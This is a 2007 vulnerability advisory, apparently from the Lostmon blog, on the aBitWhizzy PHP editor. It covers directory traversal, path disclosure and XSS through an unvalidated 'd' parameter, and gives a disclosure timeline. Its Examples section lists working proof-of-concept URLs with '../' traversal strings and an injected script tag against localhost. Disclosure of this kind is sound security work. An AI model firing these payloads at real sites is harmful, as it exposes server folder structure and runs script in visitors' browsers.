################################################
aBitWhizzy traversal folder enumeration and XSS
vendor url: http://www.unverse.net/abitwhizzy/
Advisore:http://lostmon.blogspot.com/2007/03/
abitwhizzy-traversal-folder-enumeration.html
vendor notify:YES exploit include:YES
OSVDB ID:34505,34506,34507,34508
Secunia:SA24679
FrSIRT:FrSIRT/ADV-2007-1136
BID:23167
################################################
aBitWhizzy is a php script that uses whizzywig.js to create
and edit web pages through a WYSIWYG interface, right through
your browser. Now your site can be updated by people with no
knowledge of HTML, FTP or AIG (Abbreviations In General).
aBitWhizzy contains a flaw that allows a remote traversal
arbitrary folder enumeration.This flaw exists because the
application does not validate 'd' variable upon submission
to 'whizzylink.php','whizzypic.php','whizzery/whizzypic.php' and 'whizzery/whizzylink.php' scripts.This could allow a
remote users to create a specially crafted URL that would
execute '../' directory traversal characters to view folder
structure on the target system with the privileges
of the target web service.
This input validation error permits too Cross-site scripting
Style attacks and full path disclosure.
###################
VERSIONS
###################
Unknow version of aBitWhizzy
##################
SOLUTION
##################
No solutions was available at this time !!
######################
TIMELINE
######################
discovered:25-03-2007
vendor notify:25-03-2007
vendor response:---------
Private Disclosure:25-03-2007
public disclosure:27-03-2007
#######################
Examples
#######################
Path disclosure:
http://localhost/abitwhizzy/whizzylink.php?d='
http://localhost/abitwhizzy/whizzypic.php?d='
http://localhost/abitwhizzy/whizzery/whizzypic.php?d='
http://localhost/abitwhizzy/whizzery/whizzylink.php?d='
Folder enumeration:
http://localhost/abitwhizzy/whizzylink.php?d=
../../../../../../../Documents%20and%20Settings
http://localhost/abitwhizzy/whizzypic.php?d=
../../../../../../../Documents%20and%20Settings
http://localhost/abitwhizzy/whizzery/whizzypic.php?d=
/../../../../../../../Documents%20and%20Settings
http://localhost/abitwhizzy/whizzery/whizzylink.php?d=
/../../../../../../../Documents%20and%20Settings
Cross Site Scripting:
http://localhost/abitwhizzy/whizzery/whizzypic.php?d=
/../../../../../../../Documents%20and%20Settings
"><SCRIPT>alert('XSS')</SCRIPT>
http://localhost/abitwhizzy/whizzery/whizzylink.php?d=
/../../../../../../../Documents%20and%20Settings
"><SCRIPT>alert('XSS')</SCRIPT>
http://localhost/abitwhizzy/whizzypic.php?d=
../../../../../../../Documents%20and%20Settings
"><SCRIPT>alert('XSS')</SCRIPT>
http://localhost/abitwhizzy/whizzylink.php?d=
../../../../../../../Documents%20and%20Settings
"><SCRIPT>alert('XSS')</SCRIPT>
########################### €nd ###################################
Thnx to estrella Que te ailoviuu un monton ;P
Thnx to all Lostmon´s Group Team
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Subscribe to:
Posts (Atom)